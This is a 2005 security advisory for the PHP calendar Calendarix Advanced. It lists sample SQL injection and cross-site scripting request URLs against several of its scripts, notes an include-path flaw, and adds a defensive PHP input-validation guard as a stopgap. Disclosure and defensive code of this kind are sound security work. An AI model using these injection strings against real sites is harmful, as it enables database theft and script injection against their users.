Multiple vulnerabilities in Calendarix Advanced

2005-06-01T00:00:00
ID SECURITYVULNS:DOC:8757
Type securityvulns
Reporter Securityvulns
Modified 2005-06-01T00:00:00

Description

/*******
 * Advisory: 01-0005-15
 * Title: Multiple vulnerabilities
 * Software: Calendarix Advanced
 * Date: 28. April 2005
 * Web: http://www.calendarix.com/
 **********/

  • Affected software description:

Webcalendar is web software written in PHP and MySQL.

  • Exploit:

    Include
    
    line 16 
    admin/cal_admintop.php:include_once ($calpath."cal_utils.php");
    
    XSS and SQL injection
    
    line 122 - 160
    cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*
    cal_pophols.php?id=999'[sql]/*  
    line 23
    calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1
    line 194 - 196
    cal_week.php?op=week&catview= 999'[sql]/*
    line 34 - 39
    cal_cat.php?op=cats&catview=999'[sql]*/
    
  • How to fix:

    The vendor has not responded.
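
With no vendor fix available, one stopgap is to reject malformed values for the parameters listed above before the application sees them. The request guard below is an added example, not Calendarix code and not from the advisory's author; the accepted formats (numeric `catview`, `id`, `month`, `year`, and a `YYYY-MM-DD` `date`), PHP 7 or later, and loading it through `auto_prepend_file` are assumptions.

```php
<?php
// Added example (not Calendarix code). Load before the application, for
// instance through the auto_prepend_file directive in php.ini.

// Parameters from the advisory's URLs, each with the strict format this
// example ASSUMES the scripts expect. \z anchors at the true end of the
// string, so a trailing newline cannot slip past the pattern.
const CAL_PARAM_RULES = [
    'catview' => '/^\d{1,6}\z/',
    'id'      => '/^\d{1,10}\z/',
    'month'   => '/^(?:0?[1-9]|1[0-2])\z/',
    'year'    => '/^\d{4}\z/',
    'date'    => '/^\d{4}-\d{2}-\d{2}\z/',
];

/** Return the names of request parameters that fail validation. */
function cal_guard_violations(array $request): array
{
    $bad = [];
    // $calpath builds an include path (admin/cal_admintop.php line 16),
    // so it must never be accepted from the request.
    if (array_key_exists('calpath', $request)) {
        $bad[] = 'calpath';
    }
    foreach (CAL_PARAM_RULES as $name => $pattern) {
        if (!array_key_exists($name, $request)) {
            continue;
        }
        $value = $request[$name];
        // Arrays (catview[]=...) are rejected as well as malformed strings.
        if (!is_string($value) || preg_match($pattern, $value) !== 1) {
            $bad[] = $name;
        }
    }
    return $bad;
}

// Check each input source separately so a valid GET value cannot mask a
// malformed POST or cookie value of the same name.
$violations = [];
foreach ([$_GET, $_POST, $_COOKIE] as $source) {
    $violations = array_merge($violations, cal_guard_violations($source));
}
if ($violations !== []) {
    error_log('calendar guard: rejected [' . implode(',', $violations)
        . '] from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    http_response_code(400);
    exit('Bad request');
}
```

The guard only narrows the input; the scripts themselves still need parameterized queries and HTML-encoded output for a complete fix.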
    
  • Credits:

    DarkBicho
    Email: darkbicho@gmail.com
    Web: http://www.swp-scene.org
    
  • Greetings: "To my SWP team" "Long live Peru, damn it"

--


Miguel Sumaran (DarkBicho)
Webpage: http://www.darkbicho.tk/
Team: http://www.swp-scene.org/
Made in Peru